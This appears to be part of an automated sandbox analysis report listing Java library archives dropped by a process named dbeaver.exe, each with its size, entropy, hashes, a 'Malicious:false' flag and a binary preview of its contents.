      Preview:.......2.D....+..,....-......./..0....1..2....-..3..4....5....6....7..8....9....:..;...InnerClasses...UNICODE...Lcom/sun/jna/TypeMapper;...ASCII...DEFAULT...<init>...(Z)V...Code...LineNumberTable...LocalVariableTable...stringConverter...Lcom/sun/jna/TypeConverter;...this..$Lcom/sun/jna/win32/W32APITypeMapper;...unicode...Z...booleanConverter...StackMapTable..4...<clinit>...()V..<...SourceFile...W32APITypeMapper.java....'..$com/sun/jna/win32/W32APITypeMapper$1....=...java/lang/String..>.?...[Ljava/lang/String;..@.A..$com/sun/jna/win32/W32APITypeMapper$2...java/lang/Boolean.."com/sun/jna/win32/W32APITypeMapper..................w32.ascii..B.C........com/sun/jna/DefaultTypeMapper...com/sun/jna/TypeMapper..'(Lcom/sun/jna/win32/W32APITypeMapper;)V...addTypeConverter../(Ljava/lang/Class;Lcom/sun/jna/TypeConverter;)V...addToNativeConverter..3(Ljava/lang/Class;Lcom/sun/jna/ToNativeConverter;)V...getBoolean...(Ljava/lang/String;)Z.!.......................................................0*.......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):26141
      Entropy (8bit):7.7656616098751705
      Encrypted:false
      SSDEEP:
      MD5:5DAC2F68E8288D0ADD4DC92CB161711D
      SHA1:48B9BDA22B091B1F48B13AF03FE36DB3BE6E1AE3
      SHA-256:5F65FDAF424EEE2B55E1D882BA9BB376BE93FB09B37B808BE6E22E8851C909FE
      SHA-512:EABE8B855B735663684052EC4CC357CC737936FA57CEBF144EB09F70B3B6C600DB7FA6F1C93A4F36C5994B1B37DAD2DFCEC87A41448872E69552ACCFD7F52AF6
      Malicious:false
      Reputation:unknown
      Preview:PK.........[.T................META-INF/MANIFEST.MF......Ao.0.....,.+..Sz.Rq...@e.....$.....,....tK..^.....KP"G..3Z'.J.]..E...>%...D..-*2.U&..d]..G.Z....]..y......V...]....2QJ{hj.LV..X.......&.n.c.0...E.=...a.~..........j.I.Pu@......Kp./.....W...<..es.=.......W/:H..kK3.h.Ft.3.L..Z?......rZ..X.z..h........n.m.wh...".aH..V....o..k6.!......2.+TG...{...,%..h..W^.?..o..H......aPp.`.....m:...........'.#v3..{......o~N~..Gq..PK..P)g.....o...PK.........[.T................META-INF/PK.........[.T................jakarta/PK.........[.T................jakarta/annotation/PK.........[.T................jakarta/annotation/security/PK.........[.T................jakarta/annotation/sql/PK.........[.T................META-INF/maven/PK.........[.T............"...META-INF/maven/jakarta.annotation/PK.........[.T............9...META-INF/maven/jakarta.annotation/jakarta.annotation-api/PK.........[.T................META-INF/LICENSE.md.}.r.H.."C.`1.f...g....AK...YR...z...%.A...T....=...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):10681
      Entropy (8bit):7.628516322876864
      Encrypted:false
      SSDEEP:
      MD5:72003BF6EFCC8455D414BBD7DA86C11C
      SHA1:4C28AFE1991A941D7702FE1362C365F0A8641D1E
      SHA-256:F7DC98062FCCF14126ABB751B64FAB12C312566E8CBDC8483598BFFCEA93AF7C
      SHA-512:F186B2ADA470ABBA1CC3B4F8C4373D940FB7C71A051B2C26F7C204AD4DFB69235FBF3F9C33DA36D744CB90F52D921C51D76C0FF263BACB35EAFB66CAB83DC47D
      Malicious:false
      Reputation:unknown
      Preview:PK..........PS................META-INF/MANIFEST.MF.....R.R.0..w......!i..:.....0.....5P.....7m..x...{..9.|...7.K.....7.@-dxtJ......@..^d..e.......f[.R..8r.....;.._s..zw..Ea...._..OB.![.m@l.0%T:.G0Lse.lS...R...D....Dl...B...Y.>.U&....H..\. R..o....5...%-(..f.q.X..../.....5..6....?.N.w.j...^....S...k)u..z2.$.N.Z_....0...%e[..1.?..a...|o.S..@..U;.{..=..ne....N......;&.d.j...pJ.t.v.?...w:..E."A....F..6..8t.}..PK..DZ.6........PK..........PS................META-INF/PK..........PS................jakarta/PK..........PS................jakarta/inject/PK..........PS................META-INF/maven/PK..........PS................META-INF/maven/jakarta.inject/PK..........PS............1...META-INF/maven/jakarta.inject/jakarta.inject-api/PK..........PS................META-INF/LICENSE.txt.Z[s...~...r.Si...4i...CiD.n&..%. ..... ...=....dw.VM.5I........E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>...qw}{ws..-~].SW..........j..T
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):25990
      Entropy (8bit):7.891001544133715
      Encrypted:false
      SSDEEP:
      MD5:28EE66936D5B3AAFAF6685192158B7CE
      SHA1:82182810524D4E940060D97F92B8DA39A9B06A60
      SHA-256:6748888485120E7DBBDDB31E5F9296DB4A0C8477D8C3E7900203914036B72796
      SHA-512:8E27BD365E8F38F4E74EE8FC907A1E76C575CFB5DE4D67920A807FEA3EC52D6D991C27CDCEADD12B2E03D2945C59873670DD32526387B683B2ADE2C7B62F450A
      Malicious:false
      Reputation:unknown
      Preview:PK........C.aX................META-INF/PK........C.aX.c.t............META-INF/MANIFEST.MFUPMk.@.....%.....B[..L..K...F':d....._.b...9.Px.K....ZE,.[.9...e.."....KLQc..=.g...CY.iy....Q.2a...d..j...>D..KZQ...E.A.M.....Vb>4g-....T\...P...*.4Z.d....p;.X........7dUj....-.]...jC.i.q.IZK;.s.Z............1a..Q"...B....$0Q......S...{..4....o\.u~.PK........C.aX................org/PK........C.aX................org/apache/PK........C.aX................org/apache/tools/PK........C.aX................org/apache/tools/ant/PK........C.aX................org/apache/tools/ant/util/PK........C.aX................org/apache/tools/ant/types/PK........C.aX............%...org/apache/tools/ant/types/selectors/PK........C.aX................META-INF/maven/PK........C.aX............ ...META-INF/maven/org.jkiss.bundle/PK........C.aX............/...META-INF/maven/org.jkiss.bundle/org.apache.ant/PK........C.aX....s.......)...org/apache/tools/ant/BuildException.class..[O.A...C/.k.Hm.x."...*DcjH.`....61&&.2.%.n
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):153960
      Entropy (8bit):7.93219455324505
      Encrypted:false
      SSDEEP:
      MD5:8CFA1977DAA8893FE1ADD6DF41D7D081
      SHA1:DEEB3D749E607FC1D2E673BF04F1248B53D4F42A
      SHA-256:50446B18EAAA135D1927E283639A63E452C94111C28C2A54419B1B3FA0339AFC
      SHA-512:22F4B3B98BD226BB5D3A30EFC3513736C239CB23A8D80379E179297955B373C8ED876C41CC2AF2D5EF4CE83993C6CEC1D1C26171DAC2064D576854504033B153
      Malicious:false
      Reputation:unknown
      Preview:PK........+..V................META-INF/PK........+..V.P4=...._.......META-INF/MANIFEST.MF...o.8......<.Z.8.... tb.TjU.n..>..L........~.I ..=......;.1s&x...Ai..O......2...\t..I.'..K S.A...-.I...V......5...\.(.~...~..*..........%..../.D...%3$f!O9..(....)4..G...iV..\s...".Y..f....<d).E.@D.@.1.d.>.b.J...g.S......<....,..wI.g....Q..R...3N.XM..1..=o..PV.R../.\.w.{.9...3.E.q...6.$Z>....#0.4.9..-.*.iP.|P.V....."...(D.+".l.`W...) 7....>.y..{....'-!.oO.>9!Yu\..(cG.o.>....T.}d.%.Q|.....+.&.(.`t.....<.. 4..(.Y..o.ap5...(.i&.n.#.}axz...Nc.M..j5FN;.M..;..r..am:.....9.........J.BQ+..7}oM..'.Yp..5...;.E./.8...O.......[....b...~...W..^...qq$|=..o...Z..T2\....$\.A........EDI.b"...$.Y..)..'.Fq....`..,.....)b9*:l......oU..L)....a.x.n.:t....N......xu......]3.....Ix8...ih..........j~.h.L....z.B....p....U.K.1...O.8h3f.]dH..:.|..*P...G....W.l[.g...{>....o..30,A.R..*...V>h...Z.......uk.?...m..b..:..b.6)....2h.....-.S...@~....S.SO.j..M.9...hD.aw.6q..Jq..{yha{...{.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):16820
      Entropy (8bit):7.837806309552807
      Encrypted:false
      SSDEEP:
      MD5:5978AFA86B0F70580B7906E237F85E4E
      SHA1:B38A52BF161A379EDFC0B8AE8514E14C74D5BC42
      SHA-256:3658E74E9D636B596037658DF1DEEB969D115F3A394DB09019B9B22D0F1995FA
      SHA-512:C379475B0AB6B8D1C3A691AB538EAF608DFFE147CEE79898079936DD6A21DBCAC8C6CC1C0391792FA4A6587EA37DDE8537AF02FF1FFA81E902B304C89F343E7A
      Malicious:false
      Reputation:unknown
      Preview:PK........a@uW................META-INF/MANIFEST.MF.RIS.@...*...0.E..%A...$..D..\..h..*.._?M.....e.].....{6..#.DX...<..(.[F.<!.....m...F.eV(..I.7.M..)rg_%.Y..Fi.5.,L.`.....C..).....H......M......0.s> (..<..d...^..y..=.'.. ~.|...H.Y9.......*! 0.e0vT..(.s..|.0HP..`VaX..4{...f!..G.....NV.C2.K..q.H.E^...A.....<..}..v.D..@.........P.....D..GH...M..z.....[.?..x..wQ6..3&.n.._...v>..Oim....$...x7...]a."..:7..>.x5]..>.h.m:..q.U.9.P..Fj......?D......Hrn.ck......2.......C<s...9....s.N....._.........U...X..J1.&..i.z9.0O..9.7.^UP?.F.|.7m&!.....^HE.6..&L.S..y.......R}....-#j-.AT..Q.._L.e^...v..GF....p.8..H4.{.-.s[).~N.Ub.%.....hg.7PK.....IX.......PK........a@uW................META-INF/ECLIPSE_.SF....@...F...g.@.d.9.)..,z+..*Z..Bl.......r....?..Y.hK.."..1...p`..(:..k_.+c.g>Y....1..)n...ok. ..3.Pv.J.......t..:.u............`9....L...OL....(%8i)jfLl....TT.p.h......(.....p.$;.. ........4c*.q..0G\.(~.`U6.....k.H.....oA3FK.3.c3.G...I...W'.<.|$.SU.'....:.6tm.4v..9
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):364587
      Entropy (8bit):7.885571231654946
      Encrypted:false
      SSDEEP:
      MD5:873531710031441BFA13078A684BE14D
      SHA1:BBA9EB06DDE04758F2834C30F6B418B7467CF3B9
      SHA-256:A21CDBD8006736692099CAFF4B0F85FAA9569CB7E193E1D689C1921169BCFA19
      SHA-512:7D05190D72EAED09D772E03155D83EDE58BF7BB1F555E92E1406C9E7EF6C45A1288B1474A81734F63642E1CFF4E749A7EBCD963D2E2504813DD36341259F3D68
      Malicious:false
      Reputation:unknown
      Preview:PK.........@uW................META-INF/MANIFEST.MF.}Y.....5......n..X....~...w...0..b._?R.R.Y.!)g^.B......WIn.Fa..n.m.V...@.....I:.._o.y8..o_>..?.!... ._.......?...N....EU..(.<.].....!_?.."..O/~.....v.$.c..u.$......s.4.....K.Uy........._........#.!..........jC...7.....&.cX.............!......AX.e..._..7z..}.......y..v.\Wm........,..U.......}z..............}.MX.i...O...?F7.>}c...E........w....n..{=......5nw.-............v..m....g)...T....O.Ov....e...o..w....C.aW...v.c..........w....v.G...v...cA.1.)N...7:..y......;=!;..'>....}..;M...'..N.......x..nw.XL.!.....W...o....s.#.?=...w.....B.owz(....T.d......'........o..wW|...).O+.D/.]A.K.7..;.H.v.*..a..F.k.?y......../.?..!?..g.~..w..^g|....K....7.q.|......fH..w.F...i..^....a.......M...............?..zC6.y_....2.O...=.x...$. e.....}...s..@.....b........mf.hG.hC...$.j.M...Zy!,..Y..\.....<X.....0r..'....R'aI.}.zC.RU....A..o..9A..1.!.H...l.9...7m...1...hi.a...C..b.m.>..e.).....5J<..R3vQ........l.H.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):20122
      Entropy (8bit):7.842905085031473
      Encrypted:false
      SSDEEP:
      MD5:6608FE808426A7323B82023D60FA4B61
      SHA1:24D8E904B22457A6EF40A763F45AA6AA1C744653
      SHA-256:58F52C703D17138DA22ADCBBA9CDFF44D3AC3175EA354A08AB32B6E2B6240FBF
      SHA-512:5D2C0E9DA0D07F26D6126D123D2AD136CE6C27CDEC0475940C573E2FABB056972919F4BB2C427AD57A73E0781B129BCAFAB3FDB4D2994E84166A396058086558
      Malicious:false
      Reputation:unknown
      Preview:PK........{@uW................META-INF/MANIFEST.MF.SY..J.~7.?.~..aQ\.&>.."."n/7%.X..."....3.......Y........^C..0..&..k..N(...^x0Oc.{.^.S....v.....mq.[4..B.b.A..l..o<.x....|(R.......X'.....O.).:...4j.wL...........Z...?.k....Z\.or........A..r.B.@...g..@...p.i9..bQ...6.0.a...R1.p...'~....T..8$........|.n..O7.O.. ......W..0J...R..........@..Xn........X..2`.^....[~y))...7..U"[Id....z...2...^3....t.W.. R.a....5.t...WB...@.E...e....."....n6XI...Y}.R...J.=.}a.m..W..s..i..AQ..TZq.T.ng...#X.....-#2.fv.6-.+'...n..7.E.s.....N.....t..W+.lH....c.U.I. ..~i...I..v.=_...6....n.j....c.....g0.1$...d..M......54....Qtlb^8..l{.L.......2.........XX.yk..j..........kG..._....e..r..<.~W.7NT.@.(.[/..o.C>....A....'s.T...6..o.pD...F7G..z...p...?5..t.`S...d...7.....\...PK..t<l.........PK........{@uW................META-INF/ECLIPSE_.SF..[..0...M..^. ..h...A. ..sW.`.CK).....lv..l.....y........B..B.......YP.....{.h7......2D*.]0a..w;.>../Q.+.[.@q;L{..v.8..E.....2.'.jd6:....v4.cK
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):144286
      Entropy (8bit):7.904976935654279
      Encrypted:false
      SSDEEP:
      MD5:A4EE7B04A6A1987BFA6DB72CC3EFC255
      SHA1:CDA8DC620B3BBCDEA7CA1D48F52CF6052F911A5D
      SHA-256:3479FC1D03C00C649E573585AD47EE95025BBAD5C7C333E23B683AA2AE2ED1D6
      SHA-512:E610E3A6167AE8C4B1E5F9F4873AE56295B80B69423E3FEE97BA278475FF9712B48A0823426F7C04F49266BFE6670CE8525B5DCCEB97B9724AD78C6AD281C255
      Malicious:false
      Reputation:unknown
      Preview:PK........b@uW................META-INF/MANIFEST.MF.ZY..X.~w...c.qc&...#w.....Bl...6./b.B.~(W.n....E!../...e.)^.....dGm........w....').~..W..W.....=}..e]=].."......5..T...|x..n..^..I..Z.q.5I.t..|.>.?.}Z|..J....y..o~}..}!;D|^}..+..V....c.i#....S_W..x....|..."m...=..=....Q.UaT.?..f...u..~.....|y.h~...m.I.._.......Y....U}.{..._..m.............R..W.^...F]=.A...sZ..w^...h...~.....?m...J..y.N,.m..;.c...Z...^.4..X..g..i.V^QL..\P..C.F..yq?-.~~....s..v...j......k.K..3.........z.|..{...r._...6.....Q0.3................c.'6..P.....[[5..E-.z)s.Z3....$v;....a.n....>T....~....`..|O.$.').....\J:..].L.ym.c..`...l=..$..{.B.....Oq.H...*=.ou....!tx....;Q.A...BT...QgQ....*j.d6}..O....6....V......}....f.'.k.q).......nDd].L.45......+..u.l..s..M..i...j...1*.uw.*]....)..q..B^.r$97...7.H..X......>...E.gOM.2.......xw#.hdE..]V5...x..5'.5b. .e.N....M....+....m....E8...sP.md.mZ.wAe>...+.Ua.U /.P.q..t[..w....:8..S..|ZDV..%f.~.~.n`UdMp..>..+..iU.P..v..40'..G...5..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):59528
      Entropy (8bit):7.910571185294364
      Encrypted:false
      SSDEEP:
      MD5:15DB12C583408C2AF3EF7669B0204290
      SHA1:38166A23AFB5BD5520F739B87B3BE87F7F0FB96D
      SHA-256:69E1237059ACD56F0F8654DCDE09D8A1412EEE82918BEF5564D51F8FB275711B
      SHA-512:E6750C802F6C6CF1F4D824A4DF093931E559ADFAE79FBFB5052ADBD9E07FD9A361796BC5EBBF5810238FDD8C68C3AC512602DEFEA90C044F72AC42E472923FC3
      Malicious:false
      Reputation:unknown
      Preview:PK.........QFW................META-INF/MANIFEST.MFUT..... e.T.n.0..G.?X.V .!.]....Ja."....:..cgm.._'@.v..f..7.<3.....6...fR.....3Q@.$x...QA.....@.R$........n]g\2..Y..h..=...C...c....M...s)4...O.'..T..-oO.dj.D.z.6}M. .a. .2......[..{V~Y...M......<.olS....d.(......9.b.20'....4U.0u..Q..%..A.UE@.U.R.,....u...UE...]#"..!.U..m..:.3.(..TJ(xG...Z...bL..n......Ftm.......n#.3.B.Q..nO.|...<.L....=.3o....OoS.~.-I~..{B..?K.aG<.w........~...[!..+B_Iv1..f'..jY.N...L..A.....4..p.p(IU.....!,.c{\.K..f.:k.S2.xb-<3.}.Rg...K..].......l8#..M;.=;...u.K..4...x..O........o..(.a.9.R...>G...PK..r.m.....q...PK.........qFW................META-INF/PK.........qFW................org/PK.........qFW................org/apache/PK.........qFW................org/apache/commons/PK.........qFW................org/apache/commons/cli/PK.........qFW................META-INF/maven/PK.........qFW................META-INF/maven/commons-cli/PK.........qFW............'...META-INF/maven/commons-cli/commons-cli/PK..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):360738
      Entropy (8bit):7.9086487126819245
      Encrypted:false
      SSDEEP:
      MD5:6E26920FA7228891980890CCE06B718C
      SHA1:4E3EB3D79888D76B54E28B350915B5DC3919C9DE
      SHA-256:56595FB20B0B85BC91D0D503DAD50BB7F1B9AFC0EED5DFFA6CBB25929000484D
      SHA-512:EEE671E66D808B56B81E15574675CF132D7628C010736D580915BBF8C04849F04DF1D95DDEEA13C4E119F8F0A564C7003BEEB8AB437564E080EE27063C1E52B9
      Malicious:false
      Reputation:unknown
      Preview:PK........+k.V................META-INF/PK........+k.VH..B....gM......META-INF/MANIFEST.MF.\.o.6.....A.......]..C..X.&+.l.."..Y.......>HI.x'....?....#o.8\.,_...,L.s..=...lw..8.r...!.#v.|.y..9W.v.....0.vtY.A.....O.].@..c......f..p.....*...........>g.*I....aR..^.....2......b.........^.:.M.xA..EN.8..eL......N...aq.&..s'.8. S%....r.K.=..'Q.|.d..6I.../q.x.q.".#N......"O..B.q.......M.....~.0.o..{.8.On.|../......>x.....o.....g......~.....'~...vD@... ".;.....I.Z..d..z)s.%...XC.m%v..Y..%r.....%.L....d..ekn...K.M.GE..?Y..._.oY...^......,..r..G..~..)..E!...V."K.%H.2. .%...(.5..=>.b...9N... ..`6.8r2.{.v|...7..O){.D..r.....s....Fa.9.zI...G..mj.V).{.O...%=....JOP.>.....p0......l..0..L.L..zQc.9.f.C..u..F....R...,..S..q.R)x...E..a.].Tz:....*Uv.bM.G..Pf...x....L`M.6O@~H"..S.J.%.g..K<..a...2..53.n......8(/^>c4y.>w.Z..|Fx(...V..\..[r.!q+.XL.......H@..PU...9......^_.._.N."7H9..iM....2.4/..O.,..=..N..-?R.:.O. .....1}Z}.>.'...F..la.0!.8....Jc.....-....+r..4`....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):500628
      Entropy (8bit):7.909920042885004
      Encrypted:false
      SSDEEP:
      MD5:125A9D3DC2477B10CC6FA6E89C699E81
      SHA1:5C3C2DB10F6F797430A7F9C696B4D1273768C924
      SHA-256:A328DAD730921D197B6A9B195DFFA00E41C974C2DAC8FE37E84D31706BCA7792
      SHA-512:49CF3897BF456F9639900AA9EBB396666718C5828B93BC6A95195E8CDAFC15DB5B436567B15752D9F3CD1CC0D9EEBE4447320FCCAAC6733D883AAC451E93FCC7
      Malicious:false
      Reputation:unknown
      Preview:PK.........QFW................META-INF/MANIFEST.MFUT..... e.V[O.@.~'........W.%<...F....C{....\@...i..*h...9...w.=e.$......+...mz...f!.{...KX..2b+...d$.<....\....j=.E.?D..$.0 .WK.....".?.V@A.Wq..!.._..M[W..2R: S..0M....r.PX...q" .i..]r<..V.Z.;gU..?R....Y...^P..h...\..K+....j..L.^..^".L3.NB..8.9...x .1^....c.u1....|.m.e1.zv."...Ux@05.$...i.t.!s....\.Xi.;.*...........mj.L1.F.U.zk.j..G..4.....}....8.....Mj.lA0...w.)....o..x.0........#P..&j.(m.g......rX..E..[...K....X......G..J.".....Q...P.~.)...Er.)/.).p..av.J........#..|...;e.j>s...I.t.h.^Y....5U.d.......d:.._~0].GA&..3..e.BE..7d:..#.......F..Q..o....3o..2......v~We...zj......L ......A..C....w.p|.....].......3....;........1.Y.b..d...t.........[....|.q..\\`.S.D@z2..qo.v.}.n.4o/.....Q....}..x5...PK..`..h........PK.........qFW................META-INF/PK.........qFW................org/PK.........qFW................org/apache/PK.........qFW................org/apache/commons/PK.........qFW............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):397422
      Entropy (8bit):7.9141443671114535
      Encrypted:false
      SSDEEP:
      MD5:D59FED0EA84B84A1574B023EACD47F1A
      SHA1:A905D9655C30A9B7CFD1D11473B059C72283C888
      SHA-256:D1F7E3BC145AA712736094A76B6ECC39623C29728FC0B3712666879131C89BAB
      SHA-512:6AD2D83CFB29CB6C19DB70D4A89E8BD317B10DA736AC0B9B37C3F4DF8E428AE5987BF73AA1BA9439955E7278B7E056B009B691E2E64925E3E3C5B2CFA1349D9F
      Malicious:false
      Reputation:unknown
      Preview:PK........u..J..I>............META-INF/MANIFEST.MF.T.n.0.}......j....TH.R*....[...dH..;k....$.HK.....s.g..>.l.J[O ...'..F{....G....|"dl../`.b6.\..J*...yR.....a.Av.6.\h.1X....0.Ar. .w!..*.0{.@#.1.... .9..T*...B.R.<...1.....o.FL'.....64..~...%.]..&b.c......G.].]....n.s..0.!..3.V.....iD..3..z.T ...........N..zv...0.'...>.a.E....%.@..Gy..0.....4...MYxL.<J.......S.;.r....N..WN..j..6J..z.w..z6..5...g.4.-|>e..Q....w..}..RY.L....+V..&.O.oI.....E@......<&....g..H.Jm.,.....p.B(.[dv|!,..n...mw\..8.Be...n.*...*.8.^..5..^......m.....;.,W~\...I.DR.&L...+..{..S....F=.^(Ae.......,.~!..8W.....Ex...w.....*|.3.HD......0.G`.A..I.=..:.{..h....2....m.p....r.TX....e...r.Ot.<;T.^.j5K...........|....Mc.....A0.6..=k..~I.q...k.....6.......V~..;\..J.........X...^..i..PK....I>........PK........u..J................META-INF/PK........4..J................META-INF/services/PK........9..J................org/PK........9..J................org/apache/PK........9..J.............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):325431
      Entropy (8bit):7.902109116737481
      Encrypted:false
      SSDEEP:
      MD5:DD4D333F38384E6570C3CDCED36F1BA7
      SHA1:7ABA488947C98427D91318F885CCD99E3FCB0785
      SHA-256:0278BE02A3027AADB3E37A15DD48C536BB27D7327EC9CEE7700BE19032C0EB98
      SHA-512:FF24DC78613083FEFA3A6E3528CED4DC0B9FB4AC30A99FED4B90AA8CE85A3D90B064DDAA856DE3630A7629944A9125B070AAAEE2DC4DEB35921D523007F71003
      Malicious:false
      Reputation:unknown
      Preview:PK.........lnO................META-INF/MANIFEST.MF.....6:?f....v...... ..w.....@.....W...U...PTM22"X.'....r..-.l..}............b.6.............L.A....o....r../..z...._..m..,..,..........?.....7........./7.._q.&..2.zE7\~..()...i.v....T....I]..cA7.Ifgy6dm.....4.I..?...K6.'...W......./..........U..y.3.\........St.... ..!...?..L...~.._.n..mFI.]~......>............./....m.&.....f(...>....h.~....y...'}Yg........K..S......}.....6..)*.p......k....>/...(.5.....M......q.................Xg.+.....%yQ.....bm..|..7..}.".._.._........_1.C.>>..>.M_g\...4dQ.[RG.Cs...7...>......4.N...sA...<D.#H...&.8./.IGw........................D..%........C.....>.e.i(.y.S6DS7|1"?G~......;-.w.J]>J....ey...ga.._^..G.....6..bN.9k.\....i.e..P.|.w.3.q....X.q3o.....4..i7.De.f...x.r......T..7.A.i.L.L.....OC..?...].u..7..5.(...Oz.c.x....0......d/.p..&.(K/.hC.2..f..5..j..^...3.Z6.]*|..=... ..t}@$.:>r8U6s.:...4J...Ku>...P....Q..s?`....9w.O].!.!3.7U}`5....bZ......~...rY..=.N
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):73163
      Entropy (8bit):7.900436421100859
      Encrypted:false
      SSDEEP:
      MD5:D9257298A954CFDA415B45A8E82FE717
      SHA1:886D4600F5644BD1895C108E30509E54B29BC9D6
      SHA-256:62EFDAE1766F89278400AC26132AF0F750CC8200C220ED602D527C564677FAA2
      SHA-512:C15CBA185AF097850FAE3C5CD2D7188B3380DE11E54C0A0EF6C424544CCCC96050A5504000A2D8BAA7B5A73A4D30C407AA5356C72966AE0DA09BCCFD52702982
      Malicious:false
      Reputation:unknown
      Preview:PK.........n.L................META-INF/MANIFEST.MF.Xio.....R..j.{......Zz.......}..].......) I.tH'#M>..W.s.N]..k.4ki I.(.o`m... .M..D..a...N....R.E[.u...(....8EDn.J....h;+...J..".J....ny.mDA..i.l.../tb8..$?y.|P.i...)..g.Au.A...\.......fz......%-......p-.,R........B.!>.yd.D.r!>'...J.8.b.<=i=f..IEI...^.!..........{....OL..D..U...R.....m.}i$P."J.g.@.......q^m.~.......6.....;A...........H0...a.....fnw_.....h.....l.(..6..-.. ...........<TOa.............|Y...[........dI....$...m....6?D.Q.....p..s...0...B`..u..r!...C........F....g.o....6.F.aC7....K.G...Ch.v..;.4v.k..dQ#...o.......0*..#.FZ...../..7..(.+..42....._\....g...^.......s.o...#9%..BO@c..(.....>-......c.>...0..z..&@.y6..-S......zg..^...-t.#.b=...[.....-.p..... k...+.'....6.|y<.....?,.....B{h....;-..BI..=.....t.(...`J.'.....5|7N.SB.X..).Sv.Kz.N.7....6..Qo...w_.[....y#O.....m.z.=O..-..Z.k..o.-[......j.!Pg.5......._.....HP....!...Q..1......z..[...So..t..9....]/......~SG.j...YL;........d...`.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):39691
      Entropy (8bit):7.921649508846657
      Encrypted:false
      SSDEEP:
      MD5:E9B9F7A8537F57B7A14543BC7632E714
      SHA1:DEDCE643B473090526C6583F86C19DEBEA612737
      SHA-256:CC9CB7205FF0BE5149BC3B5355CE0E5BA4AB182B5BB8A1E96B91252F31A3D324
      SHA-512:9BC4B30F212D56F809E69CBE83FE2A777FFD2681B99F23BD64ADEF431D13C73625FDE5C683B7AF86260BE2A5C0F61A895C282B511B35F83777BC2D4648ADFAB7
      Malicious:false
      Reputation:unknown
      Preview:PK........u.EQ................META-INF/......PK..............PK........u.EQ................META-INF/MANIFEST.MF.T]o.0.}G.?xy.@"&IGG...R6...*]_.0..&xulf.....$.#m.=D...=...%.4...'....".{......Qz)b.P.M.../.Qp~6.83..e.{.?.1.~.#..j...".. Z.nk<f.^F..D.."!SL.$..N..=NE*p$....7....T$.V....i......R.`...%B.o...,.....m..p8,..E...6....+x..u5\...w...`..n..u.M.A.tG2C|Y...v..$.U............y...P..u......4R.`.../x..>6.g......}Ir..{.K.i.>p...&....{.=...(TJ.....0.i.3.F.;.dgR...+P..^Xk.K........DS....v..xB.b=2.0g.....c.[R'......J.....*..iS.[.*)OO....v.....5eT...s.fu.#...^.l. .......>...gD.......M.m.i.....F..J.r.5......_..n...X..J..L 1<..'..))..2>.S..6.%9Y..vC..o.|....>k....<.../..[....PK....>.G.......PK........p.EQ................META-INF/DEPENDENCIES..j.0....0...j...&..,,......T.1#I\..w.U..h..N...|C.V..a.F..*..5..*.v..NWu."....c.D..%..q.uV....Q.]j...o.....ZT .._.6u..C..}..w.%W%..@#....9.E..J....q.....e.......n.{..P.y:.|L.h......S.'....H..T'..^Y..G...|.P.....k)....$]_w#..ME..7|
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):203481
      Entropy (8bit):7.861253679982182
      Encrypted:false
      SSDEEP:
      MD5:CA5CD0C3135D18FD15BBFB6B538E97C3
      SHA1:298AC251A696E44F354FA6E1BA69797ABA864133
      SHA-256:270BE725262D10902929320178EBFDCFD7FCEC05BD8D59796E83353C08D4AF20
      SHA-512:CE70082493C43C17763DE7354EAF5567CE5FEBC3F4E9270F7C5989B93B911CAFD559FE557DE9B2038ADBE85AD3DF14CABEC59485817A1816E687A62C4FF91F98
      Malicious:false
      Reputation:unknown
      Preview:PK.........LrT................META-INF/......PK..............PK.........LrT................META-INF/MANIFEST.MF.U]o.0.}G.?d<L 5&d-m.2..lj.]U...a2..xMbf.h..... ....2...7..,...g....:.....R.F<d.......g..N..:..X.8...WM. .....V.}..Y....J..`_..-......:...H.1{#S>.D,R.. 4...R.....+...HX?....%..b2../......~.z.L......j.{c.v....R...q..l.o.....v.C...h...h.-....T.}.v\.....Q.?.R.y.4.>...a.#....8b..k.^.q.t... 4......R+.[..b.>x.s.......G.z...o..Fo..y~..kV.'A,.Z..$.ix.'.......k......D..Zq...'V..N6......`..u>..Hr.."|.>.k..u.......Vw....s.Ch.reFLV...U.U&.k......r*.x......|n...o.^.C......c?...[.Q.s.!..3.....mw0v@.k.9....D......LC....,...a&,f...S.\...!=.@X2.!...I7r;.|.[....}..c*..y.....1x.RrQ..:....y2?n...#.[0.6"|.......YF.96....q..Vs].w...j~..f..j. 